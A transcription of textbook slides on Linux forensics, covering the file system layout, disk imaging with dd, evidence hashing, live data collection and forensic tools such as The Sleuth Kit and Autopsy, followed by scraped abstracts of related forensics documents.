Computer Forensics: Investigating File and Operating Systems, Wireless Networks, and Storage, 2nd Edition. Chapter 6 Linux Forensics
|
|
- Britton Glenn
- 5 years ago
- Views:
Transcription
1 Computer Forensics: Investigating File and Operating Systems, Wireless Networks, and Storage, 2nd Edition Chapter 6 Linux Forensics
2 Objectives After completing this chapter, you should be able to: Create a Linux forensic environment Analyze floppy disks Analyze hard disks Perform data collection using Toolkit Understand crash commands Take a step-by-step approach to a case Use Linux in forensics Describe Linux forensic tools 2
3 Introduction to Linux Forensics This chapter will explain: How to perform forensics with a Linux system as a target Why it can be beneficial to use a Linux system in other investigations 3
4 Linux Types of Linux distributions: Desktop distributions Server or enterprise distributions Live-CD distributions Linux boot sequence Loading the kernel Soft link to the current kernel image is available in the /boot directory and is referenced by the Linux Loader (LILO) Initialization: file that controls initialization is /etc/inittab 4
5 File System in Linux Most Linux distributions share a basic directory structure, with files organized in directories: /bin: common commands /boot: files needed at boot time /usr: local software, libraries, etc. /var: logs and other variable files /dev: interface files that allow kernel to interact with hardware and the file system /home: directories for each user on the system /mnt: mount points for external, remote, and removable file systems 5
6 File System in Linux Most Linux distributions share a basic directory structure, with files organized in directories (cont d): /etc: administrative configuration files and scripts /root: foot-user home directory /sbin: Administrative commands /lib: basic system libraries /opt: optional and third-party software Uses a tree, or hierarchical, structure for storing files and directories 6
7 File System in Linux Figure 6-1 A typical Linux file structure 7
8 Linux Forensics Utilities for imaging and basic disk analysis include: dd, sfdisk, fdisk, grep, md5sum, sha1sum, file, xxd, ghex, and khexedit Linux is often used in computer forensics for the following reasons: Greater control Flexibility Power 8
9 Linux Forensics Advantages of Linux in forensics: Software availability and accessibility Efficiency Optimization and customization Support Disadvantages of Linux in forensics: Investigator may need to be specially trained to use Linux Because Linux is an open-source operating system, it is frequently updated 9
10 Precautions During Investigation During an investigation, an investigator has to be sure to follow these precautions: Avoid running programs on a compromised system Do not run programs that will modify the metadata of files and directories Write the results of the investigation to a remote location Calculate the hash values of the data to avoid data alteration 10
11 Recognizing Partitions in Linux File systems must be mounted before being used Any file systems on partitions defined during installation are mounted with each boot Data can be written to devices, even when those devices are not mounted Standard IDE disk connected to the primary IDE controller as the master will be referred to as hda If the disk is connected to the primary IDE controller as a slave device it will be referred to as hdb Each partition is identified by its Linux name 11
12 mount Command Mounting Attaching a device to an existing directory on the system before being accessed Mount point Directory where the device is attached In order to remove the device, it must be unmounted before it is removed mount and umount commands Mounting: mount /dev/fd0 /mnt/floppy Unmounting: umount /dev/fd0 12
13 dd Command Options dd command Used to convert and copy a file Reads the [InFile] parameter, converts it to the specified format, and copies the data into the [OutFile] parameter 13
14 Floppy Disk Analysis Steps: Insert the floppy disk into the drive and obtain its SHA-1 hash Create an image of the floppy s contents Identify the file system Mount the image for analysis Obtain an SHA-1 hash of the contents View the file contents 14
15 Hard Disk Analysis Steps: Make an image of the hard disk using dd Use md5sum to collect information about the system time and date Mount the copy of the evidence into the file system Capture the drive s forensic data Extract deleted inode (modification/access/change) times Combine evidence for timeline conversion Generate timeline 15
16 Data Collection Forensic toolkit preparation Forensic investigators use their own forensic toolkit to find and collect any important data from a compromised system Toolkit is a pack of tools such as nc, dd, datecat, pcat, Hunter.o, insmod, NetstatArproute, dmesg, and others Investigator mounts the toolkit to a removable disk Safest to use the toolkit from a remote system in order to avoid changing the compromised system s metadata 16
17 Data Collection Using the Toolkit Steps to collect data: Media mounting: Mount the toolkit on the external media Calculate the hash value of the collected file Collect the current date result, presented in UTC format Cache tables: Collect the Mac address cache table Collect the kernel route cache table Collect information about current connections and open TCP/UDP ports 17
18 Data Collection Using the Toolkit Steps to collect data (cont d): Acquire a physical memory image List modules loaded to kernel memory: Check which modules are currently loaded in memory Analyze the ksyms file to detect the presence of an intruder Collect information about all processes, open ports, and files with the use of the lsof command Collect suspicious processes Collect information about the compromised system Gather information about the current time 18
19 Data Collection Using the Toolkit Table 6-1 An investigator can use these commands to collect information 19
20 Keyword Searching To search for signs of an intrusion, an investigator can use tools such as the following: strings: Gathers all printable characters from image files Use the -t switch to add an offset from the beginning of the file grep: Gathers commands typed by an intruder, IP addresses, passwords, or even decrypted parts of malicious code 20
21 Linux Crash Utility: Commands Table 6-2 An investigator can use these crash commands to extract system information 21
22 Investigation Examples Investigation Example I: Floppy Disk Forensics Rebecca had filed a lawsuit against Good Company, Inc., for sexual harassment by one of its senior directors, Mr. Peter Samson She claims that Mr. Samson used to send her explicit material through floppy disks marked as legitimate work, and she has submitted a floppy as evidence An investigator has been called to investigate the case on behalf of Good Company, Inc 22
23 Investigation Examples Step-by-step approach All processes must be documented The disk structure should be determined Once a separate mount point has been created, the investigator can proceed to mount the restored, imaged working copy and analyze the contents Integrity of the image file should be checked to be sure it is the same as the original Investigator can then list all files and directories in the image, including hidden files 23
24 Investigation Examples Step-by-step approach (continued) Handling date, file access, and alteration times should be noted Investigator can now search for likely evidence using grep In order to list unknown file extensions and changed file appearances, the investigator can issue the command file [changedfile] Apart from searching suspect files, certain keywords from the entire file list can be searched for 24
25 Investigation Examples Challenges in disk forensics with Linux Linux cannot identify the last sector on hard drives with an odd number of sectors Most Linux tools are used at the command line and are more complicated than Windows or Mac tools Devices can be written to, even if not mounted Bugs in open-source tools can be used to question the credibility of the tools for forensic use Original work, including the evidence, can be destroyed with a command-line typo, particularly when imaging 25
26 Investigation Examples Investigation Example II: Hard Drive Forensics Mr. Jason Smith has been accused of storing illegal material on his company s system An investigator has been called upon to examine the hard disk in question How should the investigator proceed in extracting and preserving the evidence? 26
27 Investigation Examples Step-by-step approach All processes must be documented Investigator may then proceed to prepare an image of the hard disk Partition the newly formatted disk and reboot Disk should then be formatted with the ext3 file system Investigator then prepares the disk for imaging Image the disk Check for accuracy using md5sum Mount the disk and extract evidence 27
28 Linux Forensic Tools The Sleuth Kit Collection of UNIX-based command-line file and volume system forensic analysis tools Supports DOS partitions, BSD partitions (disk labels), Mac partitions, Sun slices (Volume Table of Contents), and GPT disks Analyzes raw (dd), Expert Witness (EnCase), and AFF file systems and disk images, supporting the NTFS, FAT, UFS 1, UFS 2, ext2, ext3, and ISO 9660 file systems 28
29 Tools in The Sleuth Kit Tools include: File system layer tool: fsstat Filename layer tools: ffind, and fls Metadata layer tools: icat, ifind, ils, and istat Data-unit layer tools: dcat, dls, dstat, and dcalc File system journal tools: jcat, and jls Media management tool: mmls Image file tools: img_stat, and img_cat Disk tools: disk_sreset, and disk_stat Other tools: hfind, mactime, sorter, and sigfind 29
30 Autopsy Autopsy Forensic Browser Graphical interface to The Sleuth Kit Since Autopsy is HTML-based, the Autopsy server can be reached from any platform using an HTML browser Provides a File Manager like interface and shows details about deleted data and file system structures Analysis modes: dead analysis, and live analysis 30
31 Autopsy Evidence search techniques: file listing, file content, hash databases File type sorting Timeline of file activity Keyword search Metadata analysis Data-unit analysis Image details 31
32 SMART for Linux Figure 6-2 SMART supports plug-ins for multiple uses 32
33 Penguin Sleuth Kit Bootable Linux distribution based on Knoppix Collects several tools including The Coroner s Toolkit (TCT), Autopsy, and The Sleuth Kit, as well as penetration-testing and virus-scanning tools Offers both a GUI environment and a commandline interface 33
34 The Farmer s Boot CD Farmer s Boot CD (FBCD) Can safely and quickly preview systems (hard drives, thumb drives, digital music devices such as ipods, digital camera media, and more) directly from Linux Features include the following: Boot almost any x86 system Mount file systems in a forensically sound manner Preview data using a single, unified graphical user interface (GUI) Acquire media after it is previewed 34
35 The Farmer s Boot CD Some advantages: Allows attaching digital cameras, previewing contents of onboard memory, and dumping software information and graphics or video files Authenticates and acquires file systems or devices in simple point-and-click GUIs Generates a catalog of all hardware attached to system Dumps BIOS information of the system Easily obtains both hard drive and file system information 35
36 Delve Figure 6-3 Delve s Devices tab mounts systems in a read-only manner. Right-click on any file system to view its available options 36
37 Maresware Maresware Provides tools for investigating computer records on an Intel-based Linux machine Includes the following major programs: Bates_no Catalog Hash Hashcmp Md5 Strsrch U_to_A 37
38 Captain Nemo Figure 6-4 Captain Nemo will mount Linux drives in Windows 38
39 The Coroner s Toolkit (TCT) Coroner s Toolkit Collection containing the following programs: Grave-robber ils and mactime tools unrm and lazarus tools findkey tool 39
40 FLAG FLAG (Forensic Log Analysis GUI) Used for log file analysis and forensic investigations Uses a database as a back end to assist in managing large volumes of data FLAG features: Log analysis Network forensics Disk forensics 40
41 md5deep md5deep Cross-platform set of programs used to compute MD5, SHA-1, SHA-256, Tiger, or Whirlpool message digests on an arbitrary number of files Features include the following: Recursive operation Comparison mode Time estimation 41
42 TestDisk TestDisk helps recover lost partitions and make nonbooting disks bootable again Can perform the following functions: Fix the partition table to recover deleted partitions Recover a FAT32 boot sector from its backup Rebuild a FAT12/FAT16/FAT32 boot sector Fix FAT tables Rebuild an NTFS boot sector Recover an NTFS boot sector from its backup Copy files from deleted FAT, NTFS, and ext2/ext3 partitions 42
43 HELIX HELIX An incident response and computer forensic toolkit formerly based on Knoppix Live CD No longer available as a free forensic software Latest version, Helix3 Pro, is only available to e- Fense members through a paid subscription Booting into HELIX provides a graphical menu for accessing forensic tools 43
44 BackTrack BackTrack can be used as a bootable CD or bootable USB flash drive Also available as a VM appliance for use in a virtual environment Provides over 300 tools, such as: Penetration testing tools Wireless cracking tools Network mapping tools Information gathering tools Vulnerability identification tools Forensic and reverse engineering tools 44
45 Kali Linux Kali Linux - an updated version of BackTrack Figure 6-5 Kali Linux
46 Summary Linux imparts flexibility, power, and greater control as a forensic tool than other operating systems Linux has a number of simple utilities that make imaging and basic analysis of suspect disks There are several popular Linux toolkits that provide a GUI 46
The Sleuth Kit v2.01 and Autopsy Forensic Browser Demonstration. Anthony Dowling
The Sleuth Kit v2.01 and Autopsy Forensic Browser Demonstration Anthony Dowling Date: June 02, 2006 ii Abstract The Sleuth Kit is a collection of Linux tools that perform different aspects of a file system
More informationEd Ferrara, MSIA, CISSP
MIS 5208 - Lecture 12 Investigation Methods Data Acquisition Ed Ferrara, MSIA, CISSP eferrara@temple.edu Objectives List digital evidence storage formats Explain ways to determine the best acquisition
More informationForensic Analysis. The Treachery of Images. Alexandre Dulaunoy. February 5, Forensic Analysis Bibliography Use case Q and A
Bibliography Use case Q and A The Treachery of Images February 5, 2016 Bibliography Use case Q and A Introduction Disclaimer Images ( The Treachery of Images ) (1928) Rene Magritte La Trahison des Bibliography
More informationPost Mortem an Introduction to Filesystem Forensics and Data Recovery Dr. Oliver Tennert, Head of Technology
Post Mortem an Introduction to Filesystem Forensics and Data Recovery Dr. Oliver Tennert, Head of Technology 3. Secure Linux Administrator s Conference 2008 11.12.2008, Magdeburg Overview What is forensic
More informationComputer Forensics: Investigating Data and Image Files, 2nd Edition. Chapter 3 Forensic Investigations Using EnCase
Computer Forensics: Investigating Data and Image Files, 2nd Edition Chapter 3 Forensic Investigations Using EnCase Objectives After completing this chapter, you should be able to: Understand evidence files
More informationDigital Forensics Practicum CAINE 8.0. Review and User s Guide
Digital Forensics Practicum CAINE 8.0 Review and User s Guide Ana L. Hernandez Master of Science in Cybersecurity Digital Forensics Concentration University of South Florida 12-8-2017 Table of Contents
More informationForensic Analysis - 2nd Lab Session
File System Forensic and Analysis December 12, 2014 File System Analysis File System Analysis can be used for Analysis the activities of an attacker on the honeypot file system. Analysis of a malware leaving
More informationFundamentals of Linux Platform Security
Fundamentals of Linux Platform Security Security Training Course Dr. Charles J. Antonelli The University of Michigan 2012 Fundamentals of Linux Platform Security Module 11 Introduction to Forensics Overview
More informationDigital Forensics Lecture 01- Disk Forensics
Digital Forensics Lecture 01- Disk Forensics An Introduction to Akbar S. Namin Texas Tech University Spring 2017 Digital Investigations and Evidence Investigation of some type of digital device that has
More informationS23: You Have Been Hacked, But Where s the Evidence? A Quick Intro to Digital Forensics Bill Pankey, Tunitas Group
S23: You Have Been Hacked, But Where s the Evidence? A Quick Intro to Digital Forensics Bill Pankey, Tunitas Group You Have Been Hacked, But Where s the Evidence? A Quick Intro to Digital Forensics Bill
More informationDigital Forensics Lecture 02- Disk Forensics
Digital Forensics Lecture 02- Disk Forensics Hard Disk Data Acquisition Akbar S. Namin Texas Tech University Spring 2017 Analysis of data found on a storage device It is more common to do dead analysis
More informationOverview Metadata Extraction Tool Hachoir Sleuthkit Summary CS 6V Metadata Extraction Tools. Junyuan Zeng
CS 6V81-05 Metadata Extraction Tools Junyuan Zeng Department of Computer Science The University of Texas at Dallas September 23 th, 2011 Outline 1 Overview 2 Metadata Extraction Tool Overview 3 Hachoir
More informationANALYSIS AND VALIDATION
UNIT V ANALYSIS AND VALIDATION Validating Forensics Objectives Determine what data to analyze in a computer forensics investigation Explain tools used to validate data Explain common data-hiding techniques
More informationCHAPTER 11: IMPLEMENTING FILE SYSTEMS (COMPACT) By I-Chen Lin Textbook: Operating System Concepts 9th Ed.
CHAPTER 11: IMPLEMENTING FILE SYSTEMS (COMPACT) By I-Chen Lin Textbook: Operating System Concepts 9th Ed. File-System Structure File structure Logical storage unit Collection of related information File
More informationChapter Two. Lesson A. Objectives. Exploring the UNIX File System and File Security. Understanding Files and Directories
Chapter Two Exploring the UNIX File System and File Security Lesson A Understanding Files and Directories 2 Objectives Discuss and explain the UNIX file system Define a UNIX file system partition Use the
More informationA Study on Linux. Forensics By: Gustavo Amarchand, Keanu. Munn, and Samantha Renicker 11/1/2018
A Study on Linux 11/1/2018 Forensics By: Gustavo Amarchand, Keanu Munn, and Samantha Renicker Abstract In the field of computer forensics investigators must be familiar with many different systems and
More informationManage Directories and Files in Linux. Objectives. Understand the Filesystem Hierarchy Standard (FHS)
Manage Directories and Files in Linux Objectives Understand the Filesystem Hierarchy Standard (FHS) Identify File Types in the Linux System Change Directories and List Directory Contents Create and View
More informationDigital Forensics Lecture 5. DF Analysis Techniques
Digital Forensics Lecture 5 DF Analysis Techniques Current, Relevant Topics Wells Fargo is notifying an unspecified number of employees that their personal data, including names, Social Security numbers
More informationCSN08101 Digital Forensics. Module Leader: Dr Gordon Russell Lecturers: Robert Ludwiniak
CSN08101 Digital Forensics Lecture 6: Acquisition Module Leader: Dr Gordon Russell Lecturers: Robert Ludwiniak Objectives Storage Formats Acquisition Architecture Acquisition Methods Tools Data Acquisition
More informationABSTRACT. Forensic analysis is the process of searching for evidence and preserving it for further
ABSTRACT Forensic analysis is the process of searching for evidence and preserving it for further examination. Examination of the evidence provides important information about suspect s behavior which
More informationChapter Two File Systems. CIS 4000 Intro. to Forensic Computing David McDonald, Ph.D.
Chapter Two File Systems CIS 4000 Intro. to Forensic Computing David McDonald, Ph.D. 1 Learning Objectives At the end of this section, you will be able to: Explain the purpose and structure of file systems
More informationCIS Project 1 February 13, 2017 Jerad Godsave
CIS 484-75-4172 Project 1 February 13, 2017 Jerad Godsave Part 1) a) Below are a few screenshots indicating verification that the original evidence and the newly created.e01 forensic image match: Part
More informationDisk Imaging with Knoppix
Introduction This document explains how to use the CD-ROM bootable version of Linux, named Knoppix, to make and restore images of computer hard drives. Knoppix makes a very good system recovery tool for
More informationMFP: The Mobile Forensic Platform
MFP: The Mobile Forensic Platform Abstract Digital forensics experts perform investigations of machines for triage to see if there is a problem, as well as to gather evidence and run analyses. When the
More informationLiLo Crash Recovery. 1.0 Preparation Tips. 2.0 Quick Steps to recovery
LiLo Crash Recovery ***** *** * I have captured this information from someone else website which I didn t record where I copied it from or when I copied it. And I ve left it as it is. The credit should
More informationCourse 832 EC-Council Computer Hacking Forensic Investigator (CHFI)
Course 832 EC-Council Computer Hacking Forensic Investigator (CHFI) Duration: 5 days You Will Learn How To Understand how perimeter defenses work Scan and attack you own networks, without actually harming
More informationInitial Bootloader > Flash Drive. Warning. If not used carefully this process can be dangerous
Initial Bootloader > Flash Drive Warning If not used carefully this process can be dangerous Running the script used in this article with an incorrect argument can cause loss of data and potentially damage
More informationForensic Image Capture. Digital Forensics NETS1032 Winter 2018
Forensic Image Capture Digital Forensics NETS1032 Winter 2018 Storage Devices Storage devices are implemented using one or more of several technologies The oldest method of modern information storage is
More informationOperating System Specification Mac OS X Snow Leopard (10.6.0) or higher and Windows XP (SP3) or higher
BlackLight is a multi-platform forensic analysis tool that allows examiners to quickly and intuitively analyze digital forensic media. BlackLight is capable of analyzing data from Mac OS X computers, ios
More informationunder attack Listing Deleted Files A SECURITY BREACH CAN INSPIRE
BORIS LOZA A SECURITY BREACH CAN INSPIRE panic in administrators. This quick application note explains some techniques to be used to recover the names and contents of files during an attack or shortly
More information15-Minute Linux DFIR Triage. Dr. Phil Polstra Bloomsburg University of Pennsylvania
15-Minute Linux DFIR Triage Dr. Phil Polstra Bloomsburg University of Pennsylvania What is this talk about? Determining with some certainty if you have been hacked In a matter of minutes With minimal disturbance
More informationFile System Concepts File Allocation Table (FAT) New Technology File System (NTFS) Extended File System (EXT) Master File Table (MFT)
File System Concepts File Allocation Table (FAT) New Technology File System (NTFS) Extended File System (EXT) Master File Table (MFT) 1 FILE SYSTEM CONCEPTS: FILE ALLOCATION TABLE (FAT) Alex Applegate
More informationLinux Files and the File System
Linux Files and the File System 1. Files a. Overview A simple description of the UNIX system, also applicable to Linux, is this: "On a UNIX system, everything is a file; if something is not a file, it
More informationIncident Response Data Acquisition Guidelines for Investigation Purposes 1
Incident Response Data Acquisition Guidelines for Investigation Purposes 1 1 Target Audience This document is aimed at general IT staff that may be in the position of being required to take action in response
More informationNIST SP Notes Guide to Integrating Forensic Techniques into Incident Response
NIST SP800-86 Notes Guide to Integrating Forensic Techniques into Incident Response Authors: Karen Kent, Suzanne Chevalier, Tim Grance, Hung Dang, August 2006 Computer Forensics The application of science
More informationCOMPUTER HACKING FORENSIC INVESTIGATOR (CHFI) V9
COMPUTER HACKING FORENSIC INVESTIGATOR (CHFI) V9 Course Code: 3401 Prepare for the CHFI certification while learning advanced forensics investigation techniques. EC-Council released the most advanced computer
More informationKNOPPIX Bootable CD Validation Study for Live Forensic Preview of Suspects Computer
KNOPPIX Bootable CD Validation Study for Live Forensic Preview of Suspects Computer By: Ernest Baca www.linux-forensics.com ebaca@linux-forensics.com Page 1 of 18 Introduction I have recently become very
More informationOPERATING SYSTEM. Chapter 12: File System Implementation
OPERATING SYSTEM Chapter 12: File System Implementation Chapter 12: File System Implementation File-System Structure File-System Implementation Directory Implementation Allocation Methods Free-Space Management
More informationUsing grub to Boot various Operating Systems
Operating Systems and Systems Integration Using grub to Boot various Operating Systems Contents 1 Aim 2 2 What You Will Do 2 3 Background 2 3.1 Installing grub in MBR from a floppy, and from the OS........
More informationNAVAL POSTGRADUATE SCHOOL THESIS
NAVAL POSTGRADUATE SCHOOL MONTEREY, CALIFORNIA THESIS AUTOMATING CASE REPORTS FOR THE ANALYSIS OF DIGITAL EVIDENCE by Regis H. Friend Cassidy September 2005 Thesis Advisor: Second Reader: Chris Eagle George
More informationINSTITUTO SUPERIOR TÉCNICO
INSTITUTO SUPERIOR TÉCNICO DEPARTAMENTO DE ENGENHARIA INFORMÁTICA FORENSICS CYBER-SECURITY MEIC, METI Lab Guide II Evidence Examination 2015/2016 nuno.m.santos@tecnico.ulisboa.pt 1 Introduction This guide
More informationDa-Wei Chang CSIE.NCKU. Professor Hao-Ren Ke, National Chiao Tung University Professor Hsung-Pin Chang, National Chung Hsing University
Chapter 11 Implementing File System Da-Wei Chang CSIE.NCKU Source: Professor Hao-Ren Ke, National Chiao Tung University Professor Hsung-Pin Chang, National Chung Hsing University Outline File-System Structure
More informationbitcurator-access-webtools Quick Start Guide Last updated: May 8th, 2018 Release(s): and later
bitcurator-access-webtools Quick Start Guide Last updated: May 8th, 2018 Release(s): 0.8.2 and later About bitcurator-access-webtools The bitcurator-access-webtools service allows users to browse file
More informationChapter 11: Implementing File Systems
Chapter 11: Implementing File Systems Operating System Concepts 99h Edition DM510-14 Chapter 11: Implementing File Systems File-System Structure File-System Implementation Directory Implementation Allocation
More informationAcronis Disk Director 11 Home. Quick Start Guide
Acronis Disk Director 11 Home Quick Start Guide Copyright Acronis, Inc., 2000-2010. All rights reserved. "Acronis", "Acronis Compute with Confidence", "Acronis Recovery Manager", "Acronis Secure Zone",
More informationChapter 12: File System Implementation
Chapter 12: File System Implementation Chapter 12: File System Implementation File-System Structure File-System Implementation Directory Implementation Allocation Methods Free-Space Management Efficiency
More informationCS3600 SYSTEMS AND NETWORKS
CS3600 SYSTEMS AND NETWORKS NORTHEASTERN UNIVERSITY Lecture 11: File System Implementation Prof. Alan Mislove (amislove@ccs.neu.edu) File-System Structure File structure Logical storage unit Collection
More informationDisk Drill by LaWanda Warren
Disk Drill by LaWanda Warren GOAL OF PROJECT If you're a forensic investigator or even an everyday computer user and you want to recover some files or images from corrupt hard drive or even an external
More informationFull file at https://fratstock.eu
Guide to UNIX Using Linux Fourth Edition Chapter 2 Solutions Answers to the Chapter 2 Review Questions 1. Your company is discussing plans to migrate desktop and laptop users to Linux. One concern raised
More informationTimeline Creation and Analysis Guides
Timeline Creation and Analysis Guides Written by Chapin Bryce Researched by Chapin Bryce 175 Lakeside Ave, Room 300A Phone: 802/865-5744 Fax: 802/865-6446 http://www.lcdi.champlin.edu Timeline Creation
More information3/26/2014. Contents. Concepts (1) Disk: Device that stores information (files) Many files x many users: OS management
2013-2014 Contents 1. Concepts about the file system 2. The The disk user structure view 3. 2. Files The disk in disk structure The ext2 FS 4. 3. The Files Virtual in disk File The System ext2 FS 4. The
More informationChapter 11: Implementing File
Chapter 11: Implementing File Systems Chapter 11: Implementing File Systems File-System Structure File-System Implementation Directory Implementation Allocation Methods Free-Space Management Efficiency
More informationChapter 11: Implementing File Systems. Operating System Concepts 9 9h Edition
Chapter 11: Implementing File Systems Operating System Concepts 9 9h Edition Silberschatz, Galvin and Gagne 2013 Chapter 11: Implementing File Systems File-System Structure File-System Implementation Directory
More informationFilesystem. Disclaimer: some slides are adopted from book authors slides with permission
Filesystem Disclaimer: some slides are adopted from book authors slides with permission 1 Recap Directory A special file contains (inode, filename) mappings Caching Directory cache Accelerate to find inode
More informationBackup, File Backup copies of individual files made in order to replace the original file(s) in case it is damaged or lost.
Glossary A Active Directory a directory service that inventories, secures and manages the users, computers, rules and other components of a Microsoft Windows network. This service is typically deployed
More informationOSForensics v5 Review by Jarno Baselier
OSForensics v5 Review by Jarno Baselier I have been curious for quite some time about the forensic software OSForensics from Passmark Software. As befits every good forensic package, many tasks can be
More informationmakes floppy bootable o next comes root directory file information ATTRIB command used to modify name
File Systems File system o Designed for storing and managing files on disk media o Build logical system on top of physical disk organization Tasks o Partition and format disks to store and retrieve information
More informationChapter 10: File System Implementation
Chapter 10: File System Implementation Chapter 10: File System Implementation File-System Structure" File-System Implementation " Directory Implementation" Allocation Methods" Free-Space Management " Efficiency
More informationChapter 6. Linux File System
Chapter 6 Linux File System 1 File System File System management how to store informations on storage devices The Hierarchical Structure Types of file Common File system Tasks 2 The Hierarchical Structure
More informationCourse 55187B Linux System Administration
Course Outline Module 1: System Startup and Shutdown This module explains how to manage startup and shutdown processes in Linux. Understanding the Boot Sequence The Grand Unified Boot Loader GRUB Configuration
More informationFile System: Interface and Implmentation
File System: Interface and Implmentation Two Parts Filesystem Interface Interface the user sees Organization of the files as seen by the user Operations defined on files Properties that can be read/modified
More informationBoot Process in details for (X86) Computers
Boot Process in details for (X86) Computers Hello,,, Let's discuss what happens between the time that you power up your PC and when the desktop appears. In fact we should know that the boot process differs
More informationExam : 1Z Title : Enterprise Linux System Administration. Version : DEMO
Exam : 1Z0-403 Title : Enterprise Linux System Administration Version : DEMO 1. You are logged in to server1 and want to allow remote connections to server1 through X Display Manager Control Protocol (XDMCP).
More informationA Formal Logic for Digital Investigations: A Case Study Using BPB Modifications.
A Formal Logic for Digital Investigations: A Case Study Using BPB Modifications. Abstract I. Mitchell Middlesex University, UK A Formal Logic is developed and the following presented: i) Notation for Formal
More informationContact Details and Technical Information
Contact Details and Technical Information GetData Forensic Pty Ltd GetData Forensics USA Suite 204 1007 North Sepulveda Blvd # 1543 13a Montgomery St Manhattan Beach, CA 90267 Kogarah NSW 2217 USA Australia
More informationSource: https://articles.forensicfocus.com/2018/03/02/evidence-acquisition-using-accessdata-ftk-imager/
by Chirath De Alwis Source: https://articles.forensicfocus.com/2018/03/02/evidence-acquisition-using-accessdata-ftk-imager/ Forensic Toolkit or FTK is a computer forensics software product made by AccessData.
More informationChapter 11: Implementing File-Systems
Chapter 11: Implementing File-Systems Chapter 11 File-System Implementation 11.1 File-System Structure 11.2 File-System Implementation 11.3 Directory Implementation 11.4 Allocation Methods 11.5 Free-Space
More informationMac Os X Manually Mounted Usb Drive Read Only
Mac Os X Manually Mounted Usb Drive Read Only I sometimes need to mount USB drives that are NTFS formatted and write to them. for people who would still want to see the missing partition in read only mode.zone/hackintoshdownloads/download/506-free-ntfs-driver-for-mac-os-x/.
More informationHard Drive Recovery Using SystemRescueCD Michael Ward 4/1/2008 Introduction SystemRecoveryCD is a bootable live CD featuring a version of Linux specifically created to recover data from damaged or infected
More informationHow To Resize ext3 Partitions Without Losing Data
By Falko Timme Published: 2007-01-07 17:12 How To Resize ext3 Partitions Without Losing Data Version 1.0 Author: Falko Timme Last edited 12/31/2006 This article is about
More informationCST Algonquin College 2
Partitions Lab due dates: Labs are due as specified usually on Page1 of the Lab document Lab due dates are expressed as: 10 min before the end of the lab period during a certain week There is a grace period
More informationInvestigations and Incident Response Using BackTrack
Investigations and Incident Response Using BackTrack HTCIA New England Chapter General Meeting September 22, 2009 Ming Chow Tufts University mchow@cs.tufts.edu http://www.cs.tufts.edu/~mchow 1 Introduction
More informationChapter 12 File-System Implementation
Chapter 12 File-System Implementation 1 Outline File-System Structure File-System Implementation Directory Implementation Allocation Methods Free-Space Management Efficiency and Performance Recovery Log-Structured
More informationDESIGN AND IMPLEMENTATION OF A NETWORK FORENSICS SYSTEM FOR LINUX
DESIGN AND IMPLEMENTATION OF A NETWORK FORENSICS SYSTEM FOR LINUX Hong-Ming Wang National Kaohsiung Normal University Kaohsiung, Taiwan alexwang24@gmail.com Chung-Huang Yang National Kaohsiung Normal University
More informationThis is Worksheet and Assignment 12. Disks, Partitions, and File Systems
This is Worksheet and Assignment 12 This is a combined Worksheet and Assignment.. Quizzes and tests may refer to work done in this Worksheet and Assignment; save your answers. You will use a checking program
More informationIntroduction to Volume Analysis, Part I: Foundations, The Sleuth Kit and Autopsy. Digital Forensics Course* Leonardo A. Martucci *based on the book:
Part I: Foundations, Introduction to Volume Analysis, The Sleuth Kit and Autopsy Course* Leonardo A. Martucci *based on the book: File System Forensic Analysis by Brian Carrier LAM 2007 1/12h Outline Part
More informationFrom TCT to the Adaptability of Computer Forensic Tools
From TCT to the Adaptability of Computer Forensic Tools Haohao Zhai Wenchang Shi Bin Liang Liang Wan School of Information,Renmin University of China,Beijing 100872,China Key Lab of Data Engineering and
More informationAcknowledgments About the Authors
Preface p. xv Acknowledgments p. xix About the Authors p. xxi Case Studies p. xxv Live Incident Response p. 1 Windows Live Response p. 3 Analyzing Volatile Data p. 5 The System Date and Time p. 6 Current
More informationLab E2: bypassing authentication and resetting passwords
Lab E2: bypassing authentication and resetting passwords TTM4175 September 7, 2015 The purpose of this lab is to learn about techniques for bypassing the authentication and access control of Windows and
More informationChapter 11: Implementing File Systems
Silberschatz 1 Chapter 11: Implementing File Systems Thursday, November 08, 2007 9:55 PM File system = a system stores files on secondary storage. A disk may have more than one file system. Disk are divided
More informationCS370 Operating Systems
CS370 Operating Systems Colorado State University Yashwant K Malaiya Fall 2017 Lecture 24 File Systems Slides based on Text by Silberschatz, Galvin, Gagne Various sources 1 1 Questions from last time How
More informationInstalling caos with Cinch on Floppy Disk
Installing caos with Cinch on Floppy Disk Troy Andrew Johnson May 21, 2004 Abstract cinch is the caos Linux (http://www.caosity.org/) installer. Prerequisites What you need: two floppy disks (at least)
More informationChapter 12: File System Implementation. Operating System Concepts 9 th Edition
Chapter 12: File System Implementation Silberschatz, Galvin and Gagne 2013 Chapter 12: File System Implementation File-System Structure File-System Implementation Directory Implementation Allocation Methods
More informationGuide to Computer Forensics and Investigations Fourth Edition. Chapter 2 Understanding Computer Investigations
Guide to Computer Forensics and Investigations Fourth Edition Chapter 2 Understanding Computer Investigations Objectives Explain how to prepare a computer investigation Apply a systematic approach to an
More informationChapter 12: File System Implementation
Chapter 12: File System Implementation Silberschatz, Galvin and Gagne 2013 Chapter 12: File System Implementation File-System Structure File-System Implementation Directory Implementation Allocation Methods
More informationChapter 5 Live Data Collection Windows Systems
Chapter 5 Live Data Collection Windows Systems Ed Crowley Spring 10 1 Topics Live Investigation Goals Creating a Response Toolkit Common Tools and Toolkits Preparing the Toolkit Storing Information Obtained
More informationPL-I Assignment Broup B-Ass 5 BIOS & UEFI
PL-I Assignment Broup B-Ass 5 BIOS & UEFI Vocabulary BIOS = Basic Input Output System UEFI = Unified Extensible Firmware Interface POST= Power On Self Test BR = Boot Record (aka MBR) BC =Boot Code (aka
More informationLinux Manually Mounting External Hard Drive Mac Terminal
Linux Manually Mounting External Hard Drive Mac Terminal After the cd /Volumes command when I type ls it shows me my hard drive name twice, with Filesystem Size Used Avail Capacity iused ifree %iused Mounted
More informationTanium Incident Response User Guide
Tanium Incident Response User Guide Version 4.4.3 September 06, 2018 The information in this document is subject to change without notice. Further, the information provided in this document is provided
More informationGuide to Computer Forensics. Third Edition. Chapter 11 Chapter 11 Network Forensics
Guide to Computer Forensics and Investigations Third Edition Chapter 11 Chapter 11 Network Forensics Objectives Describe the importance of network forensics Explain standard procedures for performing a
More informationFile System Internals. Jin-Soo Kim Computer Systems Laboratory Sungkyunkwan University
File System Internals Jin-Soo Kim (jinsookim@skku.edu) Computer Systems Laboratory Sungkyunkwan University http://csl.skku.edu Today s Topics File system implementation File descriptor table, File table
More informationAccessData Advanced Forensics
